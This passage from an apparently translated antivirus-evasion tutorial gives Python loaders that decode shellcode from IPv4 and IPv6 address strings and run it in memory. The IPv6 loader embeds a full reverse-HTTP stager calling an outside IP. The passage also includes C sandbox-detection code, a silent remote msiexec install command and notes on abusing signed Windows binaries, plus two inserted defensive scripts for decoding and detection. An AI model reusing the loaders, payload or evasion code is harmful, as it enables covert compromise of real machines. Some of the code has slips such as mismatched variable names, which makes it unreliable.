    ctypes.windll.Ntdll.RtlEthernetStringToAddressA(mac_list[i], mac_list[i], ptr1)
    ptr1 += 6
ctypes.windll.kernel32.VirtualProtect(ptr, len(mac_list) * 6, 0x40, ctypes.byref(ctypes.c_long(1)))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
Python IPv4 in-memory loader

shellcode = "\xfc\x48\x83......x00\x00"
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ipv4_address = ctypes.windll.kernel32.VirtualAlloc(0, ctypes.c_int(len(shellcode) // 4 * 16), 0x3000, 0x40)
for i in range(len(shellcode) // 4):
    cut_byte = shellcode[i * 4:4 + i * 4]
    ctypes.windll.Ntdll.RtlIpv4AddressToStringA(cut_byte, ipv4_address + i * 16)
ipv4_list = []
for i in range(len(shellcode) // 4):
    ipv4_str = ctypes.string_at(ipv4address + i * 16, 16)
    ipv4_list.append(ipv4_str)
ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ptr1 = ptr
for i in range(len(ipv4_list)):
    ctypes.windll.Ntdll.RtlIpv4StringToAddressA(ipv4_list[i], False, ipv4_list[i], ptr1)
    ptr1 += 4
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
Python IPv6 in-memory loader

import ctypes

shellcode = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x60\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x31\x73\x68\x51\x00\x27\x6b\x08\x03\x3f\x21\xf1\xec\xd6\xc0\x3b\xae\xe3\xab\x55\x82\xf4\x40\xbc\x5b\x9f\xfa\x45\xbd\x37\x51\x3b\xe0\x0d\xa4\x3b\xb2\xd1\xf9\x74\xda\x3a\xd8\x44\xb1\x60\x84\xc5\x83\x10\x70\x5e\x54\x63\xc7\xf8\xf8\x74\x9b\x2b\x6a\x35\x08\xd5\x11\xa9\x32\x98\xec\xd8\x01\xf0\xc4\xae\x4b\x4b\x6c\xba\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x53\x50\x29\x0d\x0a\x00\x36\x33\x5a\x21\x1c\xe3\x65\x2d\x0e\x19\xa1\xd3\x4c\xf9\x56\xc3\x4e\x54\x7e\x1c\x21\x38\x30\xf3\xf7\x7f\x4a\x21\x52\xb8\x55\x9f\xd0\x0f\x25\x99\x79\x4a\x2b\xcc\xd7\x09\x95\x74\x3b\xee\x1c\xfa\xad\xbd\xec\x84\x00\xdb\xd8\x58\x89\xb8\xad\xd3\x86\x5b\xd3\x09\xc2\xcd\xb6\xfd\x9e\x9f\xb2\x26\xc8\xaa\xfc\x0e\xc9\xf8\xa2\xfd\x5c\x99\x91\xb7\x08\x11\xd8\x91\xde\xfe\x43\x95\x1c\x96\x29\x08\x55\x39\x21\x7d\x8c\xd5\xac\x46\x6e\x78\x65\x16\xb9\xf1\x53\xc6\x25\x76\x78\xd7\xfd\xdd\xb0\x7f\x40\xea\x7f\x68\xba\x6e\x5d\x99\x55\x5f\x11\xd9\x05\x90\x92\x2c\x9e\xb3\x75\x5e\x73\x72\x81\x4d\xe0\x00\xa6\x38\x0b\xed\xe5\x4e\xcb\x8d\xd1\x44\x12\xb3\xf8\xd0\x3a\xcc\xd6\x06\xf1\x36\x4f\x8e\x66\x39\x66\x42\xe3\xc7\x74\xa5\xbd\xac\x0d\xe6\xe5\xd3\x53\x0c\x8e\x90\xca\xd3\x01\x0d\x88\x7c\x91\x63\xdb\xe2\xd9\xb3\x4d\x9f\x57\x3b\x64\x31\x8a\x66\xea\x78\xeb\x07\x09\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x33\x38\x2e\x32\x37\x2e\x31\x32\x00\x49\x96\x02\xd2"

if len(shellcode) % 16 != 0:
    null_byte = b'\x00' * (16 - len(shellcode) % 16)
    shellcode += null_byte
ctypes.windll.Activeds.AllocADsMem.restype = ctypes.c_uint64
ptr_alloc_1 = ctypes.windll.Activeds.AllocADsMem(ctypes.c_int(len(shellcode) // 16 * 40))
ptr_realloc_1 = ctypes.windll.Activeds.ReallocADsMem(ptr_alloc_1, len(shellcode) // 16 * 40, len(shellcode) // 16 * 40)
ctypes.windll.kernel32.VirtualProtect(ptr_realloc_1, ctypes.c_int(len(shellcode) // 16 * 40), 0x40, ctypes.byref(ctypes.c_long(1)))
for i in range(len(shellcode) // 16):
    bytes_shellcode = shellcode[i * 16: 16 + i * 16]
    ctypes.windll.Ntdll.RtlIpv6AddressToStringA(bytes_shellcode, ptr_realloc_1 + i * 40)
ipv6_list = []
for i in range(len(shellcode) // 16):
    ipv6 = ctypes.string_at(ptr_realloc_1 + i * 40, 40)
    ipv6_list.append(ipv6)
print(ipv6_list)
ptr_alloc_2 = ctypes.windll.Activeds.AllocADsMem(ctypes.c_int(len(shellcode)))
ptr_realloc_2 = ctypes.windll.Activeds.ReallocADsMem(ptr_alloc_1, len(shellcode), len(shellcode))
ctypes.windll.kernel32.VirtualProtect(ptr_realloc_2, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(ctypes.c_long(1)))
rwxpage = ptr_realloc_2
for i in range(len(ipv6_list)):
    ctypes.windll.Ntdll.RtlIpv6StringToAddressA(ipv6_list[i], ipv6_list[i], rwxpage)
    rwxpage += 16
ctypes.windll.kernel32.EnumSystemLocalesW(ptr_realloc_2, 0)
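The four loaders above (UUID, MAC, IPv4, IPv6) all turn raw bytes into address-shaped strings and let a Windows Uuid*/Rtl* routine write the bytes back into memory. For an analyst who finds such a script, the useful direction is the reverse. The following is an added example, not code from this page or from the referenced projects: it pulls the encoded strings out of a script's text with one regex per encoding and decodes them with Python's own uuid and ipaddress modules, so it runs on any platform without the Windows APIs. The names CODECS, extract_chunks, decode_chunks, recover and trailing_zero_count are this example's own, and the sample strings encode the 48 constructed bytes 0x10..0x3f, not shellcode.

```python
"""Analyst-side decoder for the UUID / MAC / IPv4 / IPv6 string encodings that
the loaders above feed to UuidFromStringA, RtlEthernetStringToAddressA,
RtlIpv4StringToAddressA and RtlIpv6StringToAddressA.  Added example; standard
library only."""
import ipaddress
import re
import uuid

# kind -> (chunk size in bytes, regex for the textual form, decoder back to bytes)
CODECS = {
    # UuidFromStringA stores the GUID fields little-endian, so .bytes_le gives
    # back exactly the bytes the loader's UUIDConvert() sliced from the payload.
    "uuid": (16, re.compile(r"\b[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\b"),
             lambda s: uuid.UUID(s).bytes_le),
    # RtlEthernetAddressToStringA writes "xx-xx-xx-xx-xx-xx".
    "mac": (6, re.compile(r"\b(?:[0-9a-fA-F]{2}-){5}[0-9a-fA-F]{2}\b"),
            lambda s: bytes.fromhex(s.replace("-", ""))),
    "ipv4": (4, re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
             lambda s: ipaddress.IPv4Address(s).packed),
    # RtlIpv6AddressToStringA compresses zero runs and renders IPv4-mapped chunks
    # as "::ffff:a.b.c.d"; the regex and ipaddress both accept that form.
    "ipv6": (16, re.compile(r"(?<![0-9a-zA-Z:])(?:[0-9a-fA-F]{0,4}:){2,7}"
                            r"(?:(?:\d{1,3}\.){3}\d{1,3}|[0-9a-fA-F]{0,4})(?![0-9a-zA-Z:])"),
             lambda s: ipaddress.IPv6Address(s).packed),
}


def extract_chunks(text, kind):
    """Return every string of the given encoding found in `text`, in source order."""
    return CODECS[kind][1].findall(text)


def decode_chunks(chunks, kind):
    """Rebuild the raw byte blob from a list of encoded strings.

    Returns (blob, skipped).  A string that does not parse (a regex false positive
    such as a version number in a comment) goes into `skipped` instead of silently
    corrupting the byte stream, so the analyst can review it."""
    size, _, decode = CODECS[kind]
    blob, skipped = bytearray(), []
    for s in chunks:
        try:
            piece = decode(s)
        except ValueError:
            skipped.append(s)
            continue
        if len(piece) != size:  # guard only; cannot happen for these four codecs
            skipped.append(s)
            continue
        blob += piece
    return bytes(blob), skipped


def recover(text, kind):
    """extract_chunks + decode_chunks in one call."""
    return decode_chunks(extract_chunks(text, kind), kind)


def trailing_zero_count(blob):
    """The UUID and IPv6 loaders pad the payload with NULs up to a multiple of 16.
    Report trailing zero bytes rather than stripping them: real code can end in
    zeros too, so that decision belongs to the analyst."""
    n = 0
    for b in reversed(blob):
        if b:
            break
        n += 1
    return n


# Constructed samples: each is a snippet shaped like the list a loader script would
# carry, encoding the 48 bytes 0x10..0x3f (NOT shellcode) the way that loader does.
SAMPLE_PAYLOAD = bytes(range(0x10, 0x40))
SAMPLES = {
    "uuid": '["13121110-1514-1716-1819-1a1b1c1d1e1f", "23222120-2524-2726-2829-2a2b2c2d2e2f",'
            ' "33323130-3534-3736-3839-3a3b3c3d3e3f"]',
    "mac": '["10-11-12-13-14-15", "16-17-18-19-1a-1b", "1c-1d-1e-1f-20-21", "22-23-24-25-26-27",'
           ' "28-29-2a-2b-2c-2d", "2e-2f-30-31-32-33", "34-35-36-37-38-39", "3a-3b-3c-3d-3e-3f"]',
    # the comment line carries a deliberate false positive for the IPv4 regex
    "ipv4": '# rev 300.1.2.3\n["16.17.18.19", "20.21.22.23", "24.25.26.27", "28.29.30.31",'
            ' "32.33.34.35", "36.37.38.39", "40.41.42.43", "44.45.46.47", "48.49.50.51",'
            ' "52.53.54.55", "56.57.58.59", "60.61.62.63"]',
    "ipv6": '["1011:1213:1415:1617:1819:1a1b:1c1d:1e1f", "2021:2223:2425:2627:2829:2a2b:2c2d:2e2f",'
            ' "3031:3233:3435:3637:3839:3a3b:3c3d:3e3f"]',
}

if __name__ == "__main__":
    for kind, text in SAMPLES.items():
        blob, skipped = recover(text, kind)
        print(kind, blob == SAMPLE_PAYLOAD, "skipped:", skipped,
              "trailing zeros:", trailing_zero_count(blob))
```

Two details matter when using this on a real sample. uuid.UUID(...).bytes_le reproduces the field order UuidFromStringA writes, which is the same reason the page's UUIDConvert used bytes_le on the way in; decoding with .bytes instead would swap the first eight bytes of every chunk. And the page's MAC loader iterates len(shellcode)/6 times, so any remainder bytes of the original payload never reached the string list; a decoded blob whose length is a multiple of six says nothing about the original length.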
Nim shellcode AV evasion. Reference: https://xz.aliyun.com/t/11052
Signature modification, junk-instruction insertion, UPX packing. Reference ideas (fairly old):
https://blog.51cto.com/match/1401629
https://bbs.kanxue.com/thread-97345.htm
DLL hijacking https://xz.aliyun.com/t/11711
https://f002.backblazeb2.com/file/sec-news-backup/files/writeup/www.freebuf.com/_articles_78807_html/index.html
https://www.freebuf.com/articles/system/324598.html
https://tttang.com/archive/1365/#toc_0x09
https://sec-in.com/article/1562
https://skewwg.github.io/2020/11/26/diao-yu-yu-she-gong-xi-lie-zhi-dll-jie-chi/
Introduction to syscall-based evasion. References: https://xz.aliyun.com/t/11448
https://xz.aliyun.com/t/11496#toc-2
https://xz.aliyun.com/t/11532#toc-11
Anti-sandbox detection. References:
https://www.freebuf.com/articles/system/202717.html
https://www.anquanke.com/post/id/186218
https://forum.butian.net/share/758
https://drunkmars.top/2021/10/04/%E5%8F%8D%E6%B2%99%E7%AE%B1%E8%B0%83%E8%AF%95/
Many AV products have their own backend cloud sandbox. Such a sandbox emulates the runtime environment the software needs, uses process hooking to analyze the program's behavior while it runs, and judges whether it performs sensitive operations; a more advanced detection method feeds the collected API call sequence and other behavioral features into an intelligent analysis engine. So if our trojan has no anti-debugging measures, the sandbox detects it easily.

Preface

The simplest anti-debugging measure is checking the parent process. A program we launch by clicking it manually normally has explorer as its parent. If a program's parent is not explorer, we can assume it was started by a sandbox, and we simply exit; the AV then has nothing left to analyze.

The main idea is to call CreateToolhelp32Snapshot from kernel32 to obtain a process snapshot, get the process ID of explorer.exe from the snapshot, look up the parent process ID of the current process (by its own PID) in the same snapshot, and finally compare the two to decide whether the current process was started by a human.

Anti-debugging is not limited to checking the parent process; the Windows API IsDebuggerPresent can also be called to check whether the current process is being debugged.

Code:
#include <iostream>
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>

DWORD get_parent_processid(DWORD pid) {
    DWORD ParentProcessID = -1;
    PROCESSENTRY32 pe;
    HANDLE hkz;
    HMODULE hModule = LoadLibrary(_T("Kernel32.dll"));
    FARPROC Address = GetProcAddress(hModule, "CreateToolhelp32Snapshot");
    if (Address == NULL) {
        OutputDebugString(_T("GetProc error"));
        return (-1);
    }
    _asm {
        push 0
        push 2
        call Address
        mov hkz, eax
    }
    pe.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hkz, &pe)) {
        do {
            if (pe.th32ProcessID == pid) {
                ParentProcessID = pe.th32ParentProcessID;
                break;
            }
        } while (Process32Next(hkz, &pe));
    }
    return ParentProcessID;
}

DWORD get_explorer_processid() {
    DWORD explorer_id = -1;
    PROCESSENTRY32 pe;
    HANDLE hkz;
    HMODULE hModule = LoadLibrary(_T("Kernel32.dll"));
    if (hModule == NULL) {
        OutputDebugString(_T("Loaddll error"));
        return (-1);
    }
    FARPROC Address = GetProcAddress(hModule, "CreateToolhelp32Snapshot");
    if (Address == NULL) {
        OutputDebugString(_T("GetProc error"));
        return (-1);
    }
    _asm {
        push 0
        push 2
        call Address
        mov hkz, eax
    }
    pe.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hkz, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, L"explorer.exe") == 0) {
                explorer_id = pe.th32ProcessID;
                break;
            }
        } while (Process32Next(hkz, &pe));
    }
    return explorer_id;
}

int main() {
    DWORD explorer_id = get_explorer_processid();
    DWORD parent_id = get_parent_processid(GetCurrentProcessId());
    if (explorer_id == parent_id) {
        MessageBox(0, L"Not sandbox", L"Success", 0);
    } else {
        exit(1);
    }
}
Environment setup for CobaltStrike secondary development. Reference:
https://www.ol4three.com/2021/11/09/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/CobaltStrike/CobaltStrike%E4%BA%8C%E5%BC%80%E7%8E%AF%E5%A2%83%E5%88%9D%E6%8E%A2/
Whitelisted binaries

1. About MSBuild.exe: the Microsoft Build Engine is a platform for building applications. The engine, also called msbuild, provides an XML schema for project files that controls how the build platform processes and builds software. Visual Studio uses MSBuild, but MSBuild does not depend on Visual Studio: by invoking msbuild.exe on a project or solution file, programs can be compiled and built in environments where Visual Studio is not installed.

Note: the directory containing Msbuild.exe is not on the system PATH, so the msbuild command cannot be used directly in cmd; the full path is needed: C:\Windows\Microsoft.NET\Framework\v4.0.30319.

Requirement: .NET Framework >= 4.0

How to write the XML project file:
https://www.cnblogs.com/LyShark/p/11331476.html
https://micro8.gitbook.io/micro8/contents-1/71-80/71-ji-yu-bai-ming-dan-msbuild.exe-zhi-hang-payload-di-yi-ji
https://pplsec.github.io/2019/03/26/MSBuild.exe-bypass-application-whitelisting/
http://wiki.tidesec.com/docs/bypassav
https://www.freebuf.com/articles/network/197706.html
2. About msiexec.exe: msiexec itself may be unfamiliar, but .msi is not; many Windows installers come in .msi format. When the Windows Installer engine is installed on the operating system, MSI packages use that engine to install applications, and the executable that interprets the package and installs the product is the Msiexec.exe used here.

Some of the evasion tools introduced earlier can generate msi-format payloads, for example venom, covered in topic 6: https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ. msfvenom can also generate msi-format payloads, but those are detected quite heavily by AV.

An msi file can be run by double-clicking it or silently from the command line, and msiexec also supports remote download: upload the msi file to a server and run it remotely with the following command:

msiexec /q /i http://www.tidesec.com/shell/shell.msi

Reference: https://www.cnblogs.com/backlion/p/10493910.html
http://wiki.tidesec.com/docs/bypassav
3. About Mshta.exe: Mshta.exe is a program that ships with Microsoft Windows. Its full name is Microsoft HTML Application, and it executes .HTA files. Legitimate hta files are rarely used today, and one you do come across is quite likely malware; many evasion tools process shellcode into an .hta file that can be run directly on Windows. Several tools in the earlier tools section can generate hta backdoors:

Reference article: https://www.cnblogs.com/backlion/p/10491616.html (several methods)

4. About InstallUtil.exe: InstallUtil.exe is one of the more commonly used whitelisted binaries for evasion. It can install any installer application developed with .NET; if you develop a Windows service with the .NET Framework, the installutil.exe command line installs the service application quickly.

References for the technique:
https://pplsec.github.io/2019/03/26/InstallUtil&csc.exe-bypass-application-whitelisting/
http://wiki.tidesec.com/docs/bypassav (topic 36)
5. About Rundll32.exe: Rundll32.exe executes 32-bit DLL files, invoking dynamic link libraries from the command line. Its job is to run internal functions of a DLL, so only Rundll32.exe shows up in the process list and a DLL backdoor has no process of its own, which hides it at the process level. The system also has a Rundll.exe that executes 16-bit DLLs.

DLL files are very important to the Windows operating system and also determine how other custom Windows programs run. A dynamic link library (DLL) is a file type that provides other programs with instructions on how to call certain functionality, so several programs can share one DLL at the same time. Although a DLL has the same format as an .exe, it cannot be executed directly the way an .exe can. DLL file extensions include .dll (dynamic link library), .ocx (ActiveX control), .cpl (control panel) and .drv (device driver).

The command-line usage of Rundll32.exe is: Rundll32.exe DLLname,Functionname. Note the x86 and x64 versions of Rundll32: on a 64-bit system the default is the 64-bit Rundll32.exe (under C:\Windows\System32).

Default locations on Windows 7:

64-bit C:\Windows\System32\rundll32.exe

32-bit C:\Windows\SysWOW64\rundll32.exe

Usage can be found at:
https://www.cnblogs.com/backlion/p/10488747.html
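What the five whitelisted binaries above have in common from the defender's side is that a signed system tool is made to load its project, package, HTA, assembly or DLL from somewhere an ordinary user can write, or straight from a URL, often under a parent that has no business launching it. The following is an added example, not code from this page or from any of the referenced articles: a small triage pass over constructed process-creation records for MSBuild.exe, msiexec.exe, Mshta.exe, InstallUtil.exe and Rundll32.exe. The record format, the rule identifiers and the constructed log lines are this example's own.

```python
"""Process-creation triage for the whitelisted binaries discussed above
(MSBuild.exe, msiexec.exe, Mshta.exe, InstallUtil.exe, Rundll32.exe).
Added example with constructed records; rule names are this example's own."""
import re

# Locations an unprivileged user can write to.  A system tool pulling its
# project, package, HTA, assembly or DLL from here is what the rules key on.
USER_WRITABLE = re.compile(
    r"(?i)\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop|documents)"
    r"|users\\public|windows\\temp|programdata|temp)\\")
REMOTE_URL = re.compile(r"(?i)\bhttps?://")
INLINE_SCRIPT = re.compile(r"(?i)\b(?:javascript|vbscript):")
LOLBINS = {"msbuild.exe", "msiexec.exe", "mshta.exe", "installutil.exe", "rundll32.exe"}
# Parents that have no business spawning a build tool or an installer engine.
ODD_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
               "wscript.exe", "cscript.exe", "mshta.exe", "chrome.exe", "msedge.exe"}


def parse_event(line):
    """Parse one constructed 'Key=value|Key=value' process-creation record."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_args(cmd):
    """Drop the program token (quoted or bare) and return the rest of the command line."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[end + 1:].strip() if end != -1 else ""
    parts = cmd.split(None, 1)
    return parts[1] if len(parts) > 1 else ""


def check_event(event):
    """Return [(rule_id, detail), ...] for one event; an empty list means nothing matched."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    args = split_args(event.get("CommandLine", ""))
    hits = []
    if image in LOLBINS and parent in ODD_PARENTS:
        hits.append(("lolbin_odd_parent", f"{image} spawned by {parent}"))
    if image == "msiexec.exe":
        if REMOTE_URL.search(args):
            hits.append(("msiexec_remote_package", "package installed straight from a URL"))
        elif re.search(r"(?i)(?:^|\s)/q", args) and USER_WRITABLE.search(args):
            hits.append(("msiexec_quiet_user_path", "silent install from a user-writable path"))
    elif image == "mshta.exe":
        if REMOTE_URL.search(args) or INLINE_SCRIPT.search(args):
            hits.append(("mshta_remote_or_inline", "HTA fetched from a URL or passed inline"))
        elif USER_WRITABLE.search(args):
            hits.append(("mshta_user_path", "HTA run from a user-writable path"))
    elif image == "msbuild.exe":
        if USER_WRITABLE.search(args):
            hits.append(("msbuild_user_path_project", "project file outside any build tree"))
    elif image == "installutil.exe":
        if re.search(r"(?i)\s/u\b", args) and re.search(r"(?i)/logtoconsole=false", args):
            hits.append(("installutil_uninstall_silent", "/U with console logging disabled"))
        elif USER_WRITABLE.search(args):
            hits.append(("installutil_user_path", "assembly from a user-writable path"))
    elif image == "rundll32.exe":
        dll = args.split(",", 1)[0].strip().strip('"')   # "DLLname,Functionname" form
        if INLINE_SCRIPT.search(args):
            hits.append(("rundll32_inline_script", "script protocol handler passed to rundll32"))
        else:
            if not re.search(r"(?i)\.(?:dll|cpl)$", dll):
                hits.append(("rundll32_odd_extension", f"module {dll!r} is not a .dll/.cpl"))
            if USER_WRITABLE.search(dll):
                hits.append(("rundll32_user_path_dll", "DLL loaded from a user-writable path"))
    return hits


def triage(lines):
    """Map record index -> rule ids, for the records that produced at least one hit."""
    report = {}
    for i, line in enumerate(lines):
        hits = check_event(parse_event(line))
        if hits:
            report[i] = [rule for rule, _ in hits]
    return report


# Constructed records (Sysmon-style fields, flattened); none of this is real telemetry.
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\msiexec.exe|CommandLine=msiexec /q /i http://c2.example/update.msi|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta.exe C:\\Users\\bob\\AppData\\Local\\Temp\\inv.hta|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe|CommandLine=MSBuild.exe C:\\Users\\Public\\build.xml|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe|CommandLine=InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Users\\bob\\Downloads\\svc.exe|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32.exe C:\\ProgramData\\cache\\img.png,Start|ParentImage=C:\\Windows\\explorer.exe",
    # two benign-looking records, for contrast
    "Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32.exe shell32.dll,Control_RunDLL hotplug.dll|ParentImage=C:\\Windows\\explorer.exe",
    "Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe|CommandLine=MSBuild.exe C:\\src\\app\\app.sln /t:Build|ParentImage=C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\devenv.exe",
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_LOG).items():
        print(idx, parse_event(SAMPLE_LOG[idx])["CommandLine"], "->", rules)
```

The rules deliberately look at where the argument comes from rather than at the tool itself, because every one of these binaries is legitimately used on developer and admin machines; an MSBuild run from a source tree under devenv.exe produces no hit, while the same binary given a project in C:\Users\Public does. The parent check is kept separate so that it stacks with the per-tool rule, which is why the mshta record scores twice.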